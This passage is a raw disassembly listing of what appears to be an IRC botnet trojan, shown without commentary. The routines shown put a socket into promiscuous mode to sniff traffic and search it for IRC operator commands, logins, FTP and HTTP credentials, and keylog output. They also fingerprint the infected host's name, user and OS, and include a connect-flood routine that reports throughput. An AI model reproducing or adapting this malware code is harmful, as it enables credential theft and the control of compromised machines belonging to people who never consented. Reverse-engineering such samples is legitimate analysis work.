call dword_419220 ; ioctlsocket
loc_409F5F: ; CODE XREF: sub_409EEB+62�j
inc esi
cmp esi, edi
jl short loc_409F37
xor esi, esi
loc_409F66: ; CODE XREF: sub_409EEB+91�j
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+esi*4+var_654]
call dword_41923C ; connect
inc esi
cmp esi, edi
jl short loc_409F66
push 64h
call dword_419060 ; Sleep
xor esi, esi
loc_409F88: ; CODE XREF: sub_409EEB+AD�j
push [ebp+esi*4+var_654]
call dword_419240 ; closesocket
inc esi
cmp esi, edi
jl short loc_409F88
dec [ebp+arg_0]
jnz short loc_409F35
pop edi
pop esi
loc_409FA1: ; CODE XREF: sub_409EEB+3E�j
xor eax, eax
leave
retn
sub_409EEB endp
; =============== S U B R O U T I N E =======================================
sub_409FA5 proc near ; CODE XREF: sub_409FE8+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_408E38
push [esp+10h+arg_4]
mov edi, eax
call sub_40E0C8
push [esp+14h+arg_8]
mov ebx, eax
call sub_40E0C8
mov esi, eax
push esi
push ebx
push edi
call sub_409EEB
add esp, 18h
test eax, eax
jnz short loc_409FD9
inc eax
loc_409FD9: ; CODE XREF: sub_409FA5+31�j
cdq
mov ecx, 3E8h
idiv ecx
pop edi
cdq
idiv esi
pop esi
pop ebx
retn
sub_409FA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FE8 proc near ; DATA XREF: sub_40198E+2713�o
var_614 = byte ptr -614h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 614h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_409FA5
push eax
lea eax, [ebp+var_614]
push offset aDoneWithIkbSec ; "Done with (%iKB/sec)"
push eax
call sub_40D6BB
add esp, 18h
cmp [ebp+var_8], 0
jnz short loc_40A063
push [ebp+var_C]
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_4017B6
add esp, 10h
loc_40A063: ; CODE XREF: sub_409FE8+5A�j
lea eax, [ebp+var_614]
push eax
call sub_401648
push [ebp+var_10]
call sub_40AADD
pop ecx
pop ecx
push 0
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_409FE8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A082 proc near ; CODE XREF: sub_40A29B+1D9�p
; sub_40A29B+201�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4C4864, eax
mov eax, offset dword_4C4864
retn
sub_40A082 endp
; =============== S U B R O U T I N E =======================================
sub_40A091 proc near ; CODE XREF: sub_40A29B+27B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aBotSniff ; "Bot sniff"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40A0AB
loc_40A0A7: ; CODE XREF: sub_40A091+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A0AB: ; CODE XREF: sub_40A091+14�j
push offset dword_41E17C
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0A7
push offset aJoin_0 ; "JOIN #"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40A0D1
loc_40A0CD: ; CODE XREF: sub_40A091+4F�j
; sub_40A091+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A0D1: ; CODE XREF: sub_40A091+3A�j
push offset a302_0 ; "302 "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset a366 ; "366 "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset a_login ; ".login"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset a_l ; ".l"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset aScanningThread ; "scanning threads."
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset aMirc ; "mIRC"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset aExploit ; "exploit"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A0CD
push offset aExploiting ; "exploiting"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_40A0CD
push offset aJoin ; "JOIN # "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_40A0CD
push offset aSetsMode ; "sets mode: "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_40A0CD
push offset aIrc ; "Irc"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_40A0CD
push offset aKeylog ; "keylog"
push esi
call sub_40D810
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_40A091 endp
; =============== S U B R O U T I N E =======================================
sub_40A1B0 proc near ; CODE XREF: sub_40A29B+28C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aIrcSn ; "IRC sn"
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40A1CA
loc_40A1C6: ; CODE XREF: sub_40A1B0+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A1CA: ; CODE XREF: sub_40A1B0+14�j
push offset dword_41E17C
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A1C6
push offset aOper_0 ; "OPER "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40A1F0
loc_40A1EC: ; CODE XREF: sub_40A1B0+4F�j
; sub_40A1B0+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A1F0: ; CODE XREF: sub_40A1B0+3A�j
push offset aNick_1 ; "NICK "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A1EC
push offset aOper ; "oper "
push esi
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A1EC
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi
call sub_40D810
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_40A1B0 endp
; =============== S U B R O U T I N E =======================================
sub_40A226 proc near ; CODE XREF: sub_40A29B+29D�p
arg_0 = dword ptr 4
push offset aFtpSn ; "FTP sn"
push [esp+4+arg_0]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A24A
push offset dword_41E17C
push [esp+4+arg_0]
call sub_40D810
pop ecx
pop ecx
loc_40A24A: ; CODE XREF: sub_40A226+12�j
xor al, al
retn
sub_40A226 endp
; =============== S U B R O U T I N E =======================================
sub_40A24D proc near ; CODE XREF: sub_40A29B+2AE�p
arg_0 = dword ptr 4
push offset aHttpSn ; "HTTP sn"
push [esp+4+arg_0]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A271
push offset dword_41E17C
push [esp+4+arg_0]
call sub_40D810
pop ecx
pop ecx
loc_40A271: ; CODE XREF: sub_40A24D+12�j
xor al, al
retn
sub_40A24D endp
; =============== S U B R O U T I N E =======================================
sub_40A274 proc near ; CODE XREF: sub_40A29B+312�p
arg_0 = dword ptr 4
push offset aVulnSniff ; "VULN sniff"
push [esp+4+arg_0]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40A298
push offset dword_41E17C
push [esp+4+arg_0]
call sub_40D810
pop ecx
pop ecx
loc_40A298: ; CODE XREF: sub_40A274+12�j
xor al, al
retn
sub_40A274 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40A29B proc near ; DATA XREF: sub_40198E+1751�o
var_115BC = byte ptr -115BCh
var_115B3 = byte ptr -115B3h
var_115B0 = dword ptr -115B0h
var_115AC = dword ptr -115ACh
var_115A8 = dword ptr -115A8h
var_11590 = byte ptr -11590h
var_15BC = byte ptr -15BCh
var_DBC = byte ptr -0DBCh
var_5BC = byte ptr -5BCh
var_5BB = byte ptr -5BBh
var_4BC = byte ptr -4BCh
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 115BCh
lea ebp, [esp-74h]
call sub_40D9A0
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_BC]
rep movsd
xor esi, esi
push 3Fh
inc esi
mov [eax+90h], esi
xor ebx, ebx
pop ecx
xor eax, eax
mov [ebp+74h+var_5BC], bl
lea edi, [ebp+74h+var_5BB]
rep stosd
stosw
push 0FFh
lea eax, [ebp+74h+var_5BC]
push eax
mov [ebp+74h+var_24], 2
mov [ebp+74h+var_22], bx
mov [ebp+74h+var_20], ebx
call dword_4C47A4
lea eax, [ebp+74h+var_5BC]
push eax
call dword_4C46F0
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+74h+var_C]
push eax
call sub_40E3A0
mov eax, [ebp+74h+var_C]
add esp, 0Ch
push ebx
push 3
push 2
mov [ebp+74h+var_20], eax
call dword_4C4690
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_14], edi
jnz short loc_40A343
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_40A343: ; CODE XREF: sub_40A29B+9A�j
push 10h
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_4C4768
cmp eax, 0FFFFFFFFh
jnz short loc_40A377
call dword_4C4748
push eax
lea eax, [ebp+74h+var_4BC]
push offset aW00tBindFailed ; "-W00T- bind() failed, returned %d"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+74h+var_30], ebx
jnz short loc_40A3D2
jmp short loc_40A3B9
; ---------------------------------------------------------------------------
loc_40A377: ; CODE XREF: sub_40A29B+B8�j
push ebx
push ebx
lea eax, [ebp+74h+var_28]
push eax
push ebx
push ebx
push 4
lea eax, [ebp+74h+var_10]
push eax
push 98000001h
push edi
mov [ebp+74h+var_10], esi
call dword_4C4764
cmp eax, 0FFFFFFFFh
jnz short loc_40A3F6
call dword_4C4748
push eax
lea eax, [ebp+74h+var_4BC]
push offset aW00tWsaioctlFa ; "-W00T- WSAIoctl() failed, returned %d"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+74h+var_30], ebx
jnz short loc_40A3D2
loc_40A3B9: ; CODE XREF: sub_40A29B+DA�j
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_4BC]
push eax
lea eax, [ebp+74h+var_B8]
push eax
push [ebp+74h+var_BC]
call sub_4017B6
add esp, 10h
loc_40A3D2: ; CODE XREF: sub_40A29B+D8�j
; sub_40A29B+11C�j
lea eax, [ebp+74h+var_4BC]
push eax
call sub_401648
pop ecx
push edi
call dword_4C479C
push [ebp+74h+var_38]
call sub_40AADD
pop ecx
push ebx
call dword_4190D8 ; ExitThread
loc_40A3F6: ; CODE XREF: sub_40A29B+FC�j
mov edi, offset aSDToSDS ; "\"%s:%d\" to \"%s:%d\": - \"%s\"\n"
mov esi, 400h
loc_40A400: ; CODE XREF: sub_40A29B+197�j
; sub_40A29B+1C1�j ...
push 0FFFFh
lea eax, [ebp+74h+var_115BC]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push ebx
push 0FFFFh
lea eax, [ebp+74h+var_115BC]
push eax
push [ebp+74h+var_14]
call dword_4C45F4
cmp [ebp+74h+var_115B3], 6
jnz short loc_40A400
push [ebp+74h+var_115A8]
call dword_41921C ; htons
push [ebp+74h+var_115A8+2]
movzx eax, ax
mov [ebp+74h+arg_0], eax
call dword_41921C ; htons
cmp [ebp+74h+arg_0], 6Eh
movzx eax, ax
mov [ebp+74h+var_4], eax
jz short loc_40A400
cmp [ebp+74h+arg_0], 19h
jz short loc_40A400
cmp eax, 6Eh
jz short loc_40A400
cmp eax, 19h
jz short loc_40A400
push [ebp+74h+var_115B0]
call sub_40A082
add esp, 4
push dword ptr [eax]
call dword_419254 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_15BC]
push offset aS_0 ; "%s"
push eax
call sub_40D6BB
push [ebp+74h+var_115AC]
call sub_40A082
add esp, 10h
push dword ptr [eax]
call dword_419254 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_DBC]
push offset aS_0 ; "%s"
push eax
call sub_40D6BB
lea eax, [ebp+74h+var_11590]
push eax
mov [ebp+74h+var_8], ebx
call sub_40D630
add esp, 10h
test eax, eax
jle short loc_40A503
loc_40A4D4: ; CODE XREF: sub_40A29B+266�j
mov eax, [ebp+74h+var_8]
lea eax, [ebp+eax+74h+var_11590]
cmp byte ptr [eax], 0Dh
jnz short loc_40A4E6
mov byte ptr [eax], 20h
loc_40A4E6: ; CODE XREF: sub_40A29B+246�j
cmp byte ptr [eax], 0Ah
jnz short loc_40A4EE
mov byte ptr [eax], 20h
loc_40A4EE: ; CODE XREF: sub_40A29B+24E�j
inc [ebp+74h+var_8]
lea eax, [ebp+74h+var_11590]
push eax
call sub_40D630
cmp [ebp+74h+var_8], eax
pop ecx
jl short loc_40A4D4
loc_40A503: ; CODE XREF: sub_40A29B+237�j
cmp [ebp+74h+arg_0], 50h
jz short loc_40A542
cmp [ebp+74h+var_4], 50h
jz short loc_40A542
lea eax, [ebp+74h+var_11590]
push eax
call sub_40A091
test al, al
pop ecx
jnz short loc_40A553
lea eax, [ebp+74h+var_11590]
push eax
call sub_40A1B0
test al, al
pop ecx
jnz short loc_40A553
lea eax, [ebp+74h+var_11590]
push eax
call sub_40A226
test al, al
pop ecx
jnz short loc_40A553
loc_40A542: ; CODE XREF: sub_40A29B+26C�j
; sub_40A29B+272�j
lea eax, [ebp+74h+var_11590]
push eax
call sub_40A24D
test al, al
pop ecx
jz short loc_40A5A6
loc_40A553: ; CODE XREF: sub_40A29B+283�j
; sub_40A29B+294�j ...
lea eax, [ebp+74h+var_11590]
push eax
push [ebp+74h+var_4]
lea eax, [ebp+74h+var_DBC]
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_15BC]
push eax
push edi
lea eax, [ebp+74h+var_4BC]
push esi
push eax
call sub_40DFEC
add esp, 20h
cmp [ebp+74h+var_30], ebx
jnz loc_40A400
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_4BC]
push eax
lea eax, [ebp+74h+var_B8]
push eax
push [ebp+74h+var_BC]
call sub_4017B6
add esp, 10h
jmp loc_40A400
; ---------------------------------------------------------------------------
loc_40A5A6: ; CODE XREF: sub_40A29B+2B6�j
lea eax, [ebp+74h+var_11590]
push eax
call sub_40A274
test al, al
pop ecx
jz loc_40A400
jmp short loc_40A553
sub_40A29B endp
; =============== S U B R O U T I N E =======================================
sub_40A5BD proc near ; CODE XREF: sub_40198E+1259�p
; .text:00409E27�p
arg_0 = dword ptr 4
push esi
push edi
call dword_4190A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_4C4868
push esi
call sub_40DFEC
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_40A5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_40A610 proc near ; CODE XREF: sub_40198E+147D�p
var_210 = byte ptr -210h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_E4 = byte ptr -0E4h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 210h
push ebx
push esi
push edi
mov esi, 80h
push esi
xor ebx, ebx
lea eax, [ebp+6Ch+var_184]
push ebx
push eax
call sub_40D7B0
push 8
lea eax, [ebp+6Ch+var_8]
push ebx
push eax
call sub_40D7B0
add esp, 18h
cmp dword_4B98D8, ebx
jnz short loc_40A67F
push ebx
push esi
lea eax, [ebp+6Ch+var_184]
push eax
lea eax, [ebp+6Ch+var_14]
push eax
call dword_4C47D8
test [ebp+6Ch+var_14], 1
lea eax, [ebp+6Ch+var_8]
push 7
jz short loc_40A678
push offset dword_41B694
loc_40A66D: ; CODE XREF: sub_40A610+6D�j
push eax
call sub_40DB80
add esp, 0Ch
jmp short loc_40A6A2
; ---------------------------------------------------------------------------
loc_40A678: ; CODE XREF: sub_40A610+56�j
push offset dword_41B690
jmp short loc_40A66D
; ---------------------------------------------------------------------------
loc_40A67F: ; CODE XREF: sub_40A610+38�j
push 7
mov esi, offset off_41B68C
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_40DB80
push 7Fh
lea eax, [ebp+6Ch+var_184]
push esi
push eax
call sub_40DB80
add esp, 18h
loc_40A6A2: ; CODE XREF: sub_40A610+66�j
push 10h
pop esi
push esi
lea eax, [ebp+6Ch+var_28]
push ebx
push eax
mov [ebp+6Ch+var_18], esi
call sub_40D7B0
add esp, 0Ch
lea eax, [ebp+6Ch+var_18]
push eax
lea eax, [ebp+6Ch+var_28]
push eax
push [ebp+6Ch+arg_8]
call dword_41922C ; getsockname
lea eax, [ebp+6Ch+var_104]
push eax
mov [ebp+6Ch+var_C], esi
mov [ebp+6Ch+var_10], 15h
call dword_419154 ; GlobalMemoryStatus
lea eax, [ebp+6Ch+var_CC]
push eax
mov [ebp+6Ch+var_CC], 94h
call dword_419138 ; GetVersionExA
cmp [ebp+6Ch+var_C8], 4
jnz short loc_40A72F
cmp [ebp+6Ch+var_C4], ebx
jnz short loc_40A715
cmp [ebp+6Ch+var_BC], 1
mov esi, offset dword_41B454
jz short loc_40A708
mov esi, [ebp+6Ch+arg_0]
loc_40A708: ; CODE XREF: sub_40A610+F3�j
cmp [ebp+6Ch+var_BC], 2
jnz short loc_40A788
mov esi, offset dword_41B450
jmp short loc_40A764
; ---------------------------------------------------------------------------
loc_40A715: ; CODE XREF: sub_40A610+E8�j
cmp [ebp+6Ch+var_C4], 0Ah
jnz short loc_40A722
mov esi, offset dword_41B44C
jmp short loc_40A75E
; ---------------------------------------------------------------------------
loc_40A722: ; CODE XREF: sub_40A610+109�j
cmp [ebp+6Ch+var_C4], 5Ah
jnz short loc_40A759
mov esi, offset dword_41B448
jmp short loc_40A75E
; ---------------------------------------------------------------------------
loc_40A72F: ; CODE XREF: sub_40A610+E3�j
cmp [ebp+6Ch+var_C8], 5
jnz short loc_40A759
cmp [ebp+6Ch+var_C4], ebx
jnz short loc_40A741
mov esi, offset dword_41B444
jmp short loc_40A75E
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A610+128�j
cmp [ebp+6Ch+var_C4], 1
jnz short loc_40A74E
mov esi, offset dword_41B440
jmp short loc_40A75E
; ---------------------------------------------------------------------------
loc_40A74E: ; CODE XREF: sub_40A610+135�j
cmp [ebp+6Ch+var_C4], 2
mov esi, offset dword_41B43C
jz short loc_40A75E
loc_40A759: ; CODE XREF: sub_40A610+116�j
; sub_40A610+123�j
mov esi, offset dword_41B438
loc_40A75E: ; CODE XREF: sub_40A610+110�j
; sub_40A610+11D�j ...
cmp [ebp+6Ch+var_BC], 2
jnz short loc_40A788
loc_40A764: ; CODE XREF: sub_40A610+103�j
cmp [ebp+6Ch+var_B8], bl
jz short loc_40A788
lea eax, [ebp+6Ch+var_B8]
push eax
push esi
lea eax, [ebp+6Ch+var_210]
push offset dword_41B684
push eax
call sub_40D6BB
add esp, 10h
lea esi, [ebp+6Ch+var_210]
loc_40A788: ; CODE XREF: sub_40A610+FC�j
; sub_40A610+152�j ...
call dword_4190A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov edi, eax
lea eax, [ebp+6Ch+var_C]
push eax
lea eax, [ebp+6Ch+var_38]
push eax
call dword_419150 ; GetComputerNameA
lea eax, [ebp+6Ch+var_10]
push eax
lea eax, [ebp+6Ch+var_E4]
push eax
call dword_419004 ; GetUserNameA
mov eax, edi
cdq
mov ecx, 15180h
idiv ecx
mov edi, 0E10h
push [ebp+6Ch+arg_4]
mov ecx, eax
mov eax, edx
cdq
idiv edi
mov edi, eax
movzx eax, [ebp+6Ch+var_21]
push eax
movzx eax, [ebp+6Ch+var_22]
push eax
movzx eax, [ebp+6Ch+var_23]
push eax
movzx eax, [ebp+6Ch+var_24]
push eax
lea eax, [ebp+6Ch+var_184]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
lea eax, [ebp+6Ch+var_E4]
push eax
lea eax, [ebp+6Ch+var_38]
push eax
push 3Ch
pop ebx
mov eax, edx
cdq
idiv ebx
push eax
mov eax, [ebp+6Ch+var_F8]
push edi
push ecx
shr eax, 14h
push eax
mov eax, [ebp+6Ch+var_FC]
shr eax, 14h
push eax
push [ebp+6Ch+var_C0]
push [ebp+6Ch+var_C4]
push [ebp+6Ch+var_C8]
push esi
push offset dword_41B5A8
push [ebp+6Ch+arg_0]
call sub_40D6BB
mov eax, [ebp+6Ch+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_40A610 endp
; =============== S U B R O U T I N E =======================================
sub_40A83B proc near ; CODE XREF: sub_40198E+10FD�p
; sub_40198E+132F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_421E08
loc_40A843: ; CODE XREF: sub_40A83B+18�j
cmp byte ptr [eax], 0
jz short loc_40A857
add eax, 434h
inc edi
cmp eax, offset dword_4A8608
jl short loc_40A843
jmp short loc_40A8A2
; ---------------------------------------------------------------------------
loc_40A857: ; CODE XREF: sub_40A83B+B�j
push esi
mov esi, edi
imul esi, 434h
push 3FFh
push [esp+0Ch+arg_0]
lea eax, dword_421E08[esi]
push eax
call sub_40DB80
mov eax, [esp+14h+arg_4]
and dword_42220C[esi], 0
and dword_422210[esi], 0
mov dword_422208[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
loc_40A894: ; DATA XREF: .text:0041F834�o
; .text:0041F878�o ...
and byte_422220[esi], 0
mov dword_422214[esi], eax
pop esi
loc_40A8A2: ; CODE XREF: sub_40A83B+1A�j
mov eax, edi
pop edi
retn
sub_40A83B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8A6 proc near ; CODE XREF: sub_40AB1A+31�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 400h
push esi
push edi
push [ebp+arg_8]
push offset dword_41B6A4
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4017B6
add esp, 10h
xor edi, edi
mov esi, offset dword_421E08
loc_40A8CE: ; CODE XREF: sub_40A8A6+74�j
cmp byte ptr [esi], 0
jz short loc_40A90D
cmp [ebp+arg_C], 0
jnz short loc_40A8E2
cmp dword ptr [esi+404h], 0
jnz short loc_40A90D
loc_40A8E2: ; CODE XREF: sub_40A8A6+31�j
push esi
push edi
lea eax, [ebp+var_400]
push offset dword_41B69C
push eax
call sub_40D6BB
push [ebp+arg_8]
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4017B6
add esp, 20h
loc_40A90D: ; CODE XREF: sub_40A8A6+2B�j
; sub_40A8A6+3A�j
add esi, 434h
inc edi
cmp esi, offset dword_4A8608
jl short loc_40A8CE
pop edi
pop esi
leave
retn
sub_40A8A6 endp
; =============== S U B R O U T I N E =======================================
sub_40A920 proc near ; CODE XREF: sub_40198E+1E41�p
; sub_40A9B3+12�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [esp+0Ch+var_4], ebx
jle short loc_40A9AB
cmp esi, 200h
jge short loc_40A9AB
imul esi, 434h
push ebp
push edi
push ebx
lea edi, dword_42221C[esi]
push dword ptr [edi]
call dword_419158 ; TerminateThread
cmp [edi], ebx
jz short loc_40A95C
mov [esp+0Ch+arg_0], 1
loc_40A95C: ; CODE XREF: sub_40A920+32�j
mov [edi], ebx
lea edi, dword_422210[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_422208[esi], ebx
mov dword_42220C[esi], ebx
jbe short loc_40A97D
push eax
call sub_409718
pop ecx
loc_40A97D: ; CODE XREF: sub_40A920+54�j
mov ebp, dword_419240
mov [edi], ebx
lea edi, dword_422214[esi]
push dword ptr [edi]
mov byte ptr dword_421E08[esi], bl
mov byte_422220[esi], bl
call ebp ; closesocket
lea esi, dword_422218[esi]
push dword ptr [esi]
mov [edi], ebx
call ebp ; closesocket
pop edi
mov [esi], ebx
pop ebp
loc_40A9AB: ; CODE XREF: sub_40A920+F�j
; sub_40A920+17�j
mov eax, [esp+0Ch+var_4]
pop esi
pop ebx
pop ecx
retn
sub_40A920 endp
; =============== S U B R O U T I N E =======================================
sub_40A9B3 proc near ; CODE XREF: sub_40198E+1E08�p
; sub_408B66:loc_408B82�p
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_421E08
loc_40A9BF: ; CODE XREF: sub_40A9B3+2A�j
cmp byte ptr [esi], 0
jz short loc_40A9D0
push edi
call sub_40A920
test eax, eax
pop ecx
jz short loc_40A9D0
inc ebx
loc_40A9D0: ; CODE XREF: sub_40A9B3+F�j
; sub_40A9B3+1A�j
add esi, 434h
inc edi
cmp esi, offset dword_4A8608
jl short loc_40A9BF
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40A9B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9E5 proc near ; CODE XREF: sub_40198E+17B7�p
; sub_40AA51+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_42220C
loc_40A9F9: ; CODE XREF: sub_40A9E5+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40AA1B
test edi, edi
jle short loc_40AA0D
cmp [esi], edi
jz short loc_40AA0D
cmp ebx, edi
jnz short loc_40AA1B
loc_40AA0D: ; CODE XREF: sub_40A9E5+1E�j
; sub_40A9E5+22�j
push ebx
call sub_40A920
test eax, eax
pop ecx
jz short loc_40AA1B
inc [ebp+var_4]
loc_40AA1B: ; CODE XREF: sub_40A9E5+1A�j
; sub_40A9E5+26�j ...
add esi, 434h
inc ebx
cmp esi, offset dword_4A8A0C
jl short loc_40A9F9
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40A9E5 endp
; =============== S U B R O U T I N E =======================================
sub_40AA32 proc near ; CODE XREF: sub_40198E+1569�p
; sub_40198E+16C3�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_422208
loc_40AA39: ; CODE XREF: sub_40AA32+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40AA42
inc eax
loc_40AA42: ; CODE XREF: sub_40AA32+D�j
add ecx, 434h
cmp ecx, offset dword_4A8A08
jl short loc_40AA39
retn
sub_40AA32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA51 proc near ; CODE XREF: sub_40198E:loc_402ED1�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 400h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_40AA6A
push [ebp+arg_1C]
call sub_40E0C8
pop ecx
loc_40AA6A: ; CODE XREF: sub_40AA51+E�j
push eax
push [ebp+arg_18]
call sub_40A9E5
test eax, eax
pop ecx
pop ecx
jle short loc_40AA96
push eax
push [ebp+arg_14]
lea eax, [ebp+var_400]
